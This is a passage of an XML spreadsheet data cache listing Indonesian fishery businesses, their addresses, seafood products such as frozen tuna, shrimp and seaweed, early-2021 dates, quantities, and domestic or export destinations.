    <s v="Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23845"/>
    <x v="940"/>
    <s v="CV. INTI YUDA SAMUDRA"/>
    <s v="Jl. Pramuka No.27B, Kel. Cibinong, Kec. Gunung Sindur, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Air Tawar Beku (Lele)"/>
    <d v="2021-03-04T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Bogor"/>
    <s v="Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23849"/>
    <x v="941"/>
    <s v="CV. ANUGRAH LIN PERKASA"/>
    <s v="Jl. Raya Lingkar Timur Komplek Pergudangan Platinum No.5A, Kel. Siwalanpanji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Japan, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="23850"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Beku (Tongkol, Lemadang, Layang, Cakalang)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="500000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23851"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Segar (Tongkol, Lemadang, Layang, Cakalang)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="500000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23852"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="JL,BTN Khayangan Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Beku (Kuwe, Kerapu, Kakap, Baronang, Pogot)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="15000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23853"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Segar (Kuwe, Kerapu, Kakap, Baronang, Pogot)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="15000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23854"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="60000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23856"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="60000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23857"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="250000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23858"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Segar"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="250000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23859"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23860"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Loin Segar"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23861"/>
    <x v="942"/>
    <s v="CV, LAUTAN MAS"/>
    <s v="Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="11000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur"/>
    <m/>
  </r>
  <r>
    <n v="23862"/>
    <x v="477"/>
    <s v="PT, BARAMUDA BAHARI"/>
    <s v="Desa Wonokoyo, Kel, Wonokoyo, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Beku"/>
    <d v="2021-01-19T00:00:00"/>
    <n v="808500"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23863"/>
    <x v="943"/>
    <s v="PT. CENTRAL PULAU LAUT"/>
    <s v="Jl. Romokalisari IV No.27, Kel. Romokalisari, Kec. Benowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-11T00:00:00"/>
    <n v="120000000"/>
    <s v="Kota Makassar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23864"/>
    <x v="885"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 (Room G5 &amp; G7), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Seabass)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Bandung, Kota Yogyakarta, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23866"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23867"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23868"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Marlin, Tenggiri, Mata Besar, Cakalang)"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23869"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Marlin, Tenggiri, Mata Besar, Cakalang)"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23871"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Kuniran, Kerapu, Kakap, Kurisi)"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23872"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Segar"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23873"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Beku"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23874"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kepiting Segar"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23875"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kepiting Beku"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23876"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23877"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23878"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Lobster Segar"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23879"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Lobster Beku"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23880"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerang Segar"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23881"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerang Beku"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23886"/>
    <x v="802"/>
    <s v="PT. SAMUDERA TIGA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok T No.12, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="200000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23887"/>
    <x v="245"/>
    <s v="PT. MORENZO ABADI PERKASA"/>
    <s v="Jl. Raya Demak-Kudus Km 10 RT 002 RW 003, Kel. Gajah, Kec. Gajah, Kabupaten Demak&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="20"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="23888"/>
    <x v="245"/>
    <s v="PT. MORENZO ABADI PERKASA"/>
    <s v="Jl. Raya Demak-Kudus Km 10 RT 002 RW 003, Kel. Gajah, Kec. Gajah, Kabupaten Demak&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="20"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="23889"/>
    <x v="945"/>
    <s v="PT. BAROKAH JAYA PERKASA"/>
    <s v="Jl. Riau No. 22, Kel. Bagan Kota, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Senangin, Jenaha, Tenggiri, Parang-parang)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23890"/>
    <x v="945"/>
    <s v="PT. BAROKAH JAYA PERKASA"/>
    <s v="Jl. Riau No. 22, Kel. Bagan Kota, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Bawal Hitam, Sebelah, Manyung, Kerapu, Layur, Kakap Merahi)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23891"/>
    <x v="945"/>
    <s v="PT. BAROKAH JAYA PERKASA"/>
    <s v="Jl. Riau No. 22, Kel. Bagan Kota, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Kering"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="4800"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23892"/>
    <x v="945"/>
    <s v="PT. BAROKAH JAYA PERKASA"/>
    <s v="Jl. Riau No. 22, Kel. Bagan Kota, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23893"/>
    <x v="945"/>
    <s v="PT. BAROKAH JAYA PERKASA"/>
    <s v="Jl. Riau No. 22, Kel. Bagan Kota, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Kering"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="9600"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23897"/>
    <x v="946"/>
    <s v="PT. OCEANICA MEGAH UTAMA"/>
    <s v="Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Amberjack, Hamachi, Makerel, Salem, Saba Mackerel)"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="105416"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23898"/>
    <x v="946"/>
    <s v="PT. OCEANICA MEGAH UTAMA"/>
    <s v="Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Segar (Amberjack, Hamachi, Makerel, Salem, Saba Mackerel)"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="491"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23899"/>
    <x v="946"/>
    <s v="PT. OCEANICA MEGAH UTAMA"/>
    <s v="Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="281433"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23900"/>
    <x v="946"/>
    <s v="PT. OCEANICA MEGAH UTAMA"/>
    <s v="Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="1639201"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23901"/>
    <x v="946"/>
    <s v="PT. OCEANICA MEGAH UTAMA"/>
    <s v="Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Kod, Flounder, Halibut, Striped Jack, Seabass, Seabrem)"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23902"/>
    <x v="946"/>
    <s v="PT. OCEANICA MEGAH UTAMA"/>
    <s v="Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Segar (Kod, Flounder, Halibut, Seabream, Striped Jack, Seabass)"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23903"/>
    <x v="946"/>
    <s v="PT. OCEANICA MEGAH UTAMA"/>
    <s v="Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="331540"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23904"/>
    <x v="946"/>
    <s v="PT. OCEANICA MEGAH UTAMA"/>
    <s v="Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="18000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23905"/>
    <x v="946"/>
    <s v="PT. OCEANICA MEGAH UTAMA"/>
    <s v="Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="18000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23906"/>
    <x v="947"/>
    <s v="PT. GRAHA MEGATOP BORNEO"/>
